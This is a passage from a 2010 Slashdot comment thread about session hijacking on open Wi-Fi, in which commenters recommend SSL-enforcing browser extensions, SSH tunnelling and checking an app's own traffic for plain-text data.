      One way to find out is to do a promiscuous tcpdump of your local network traffic while using that app - if you can read personally identifiable items in plain text, you are simply not safe.

  • I really miss the good old days, when talks at security conferences would blow you away, and when people would actually talk about new security related things, rather than showing the 76th way of automating a process/procedure that has been known for 10 years (always involving grabbing [flavor of the month service]'s password).

    Oh well, guess people were in security world for different reasons 10 years ago...

    • by Hartree (191324)

      I must be really really old...

      Yeah, you are. And me too. I bet a lot of the young'uns here have never heard of the protocol in your username.

  • This needs to be heard by everyone. NOW. Sure, your New York Times access is largely trivial, but Facebook and gmail access? That's someone's life. Amazon, and soon Netflix, PayPal, and eBay? That's someone's money. Maybe once people start losing money and their jobs websites will realize the severity of security, as that's usually when it hits home. But until then, very neat.

    Protect yourself: https://addons.mozilla.org/en-US/firefox/addon/12714/ [mozilla.org]

  • KB SSL Enforcer (Score:3, Interesting)

    by brunes69 (86786) on Monday October 25, 2010 @10:57AM (#34012332) Homepage

    This is why I use this Chrome extension - https://chrome.google.com/extensions/detail/flcpelgcagfhfoegekianiofphddckof [google.com]

    Basically for any site you go to it AUTOMATICALLY redirects you to the SSL version of that site if it exists. Including ssl.facebook.com.

    Yes ssl.facebook.com should be the default, as should most sites, but until they are this extension is invaluable IMO.

  • When I am using public WiFi, I tend to SSH-tunnel to my proxy at home for web browsing,
    It usually makes for a better browsing experience too because DNS on public WiFi usually sucks and the compression over SSH means that most web pages load quicker.

  • Although I'm not holding my breath for IPv6 to be widely adopted any time soon....the fact that encryption is mandated in the protocol as an option is something that is long overdue. Clear text non-encrypted network traffic is something everybody should avoid if possible. (which is REALLY hard without a lot of work).

    Maybe if encryption was mandated in packets, sniffing this sort of stuff would not be an issue? (yes)

  • Speaking as seebs, who I actually am, I think this addon is a brilliant example of the importance of making a threat concrete and specific in order for people to understand it. I, for one, welcome our new us overlords.

    Consider:

    http://www.csd.uwo.ca/staff/magi/personal/humour/Computer_Folklore/Robin%20Hood%20And%20Friar%20Tuck.html [csd.uwo.ca]

    This is not a new technique. This is not a bad thing, particularly. And compared to the severity of the problem, I think it's pretty tastefully understated.

    And again, this is ac
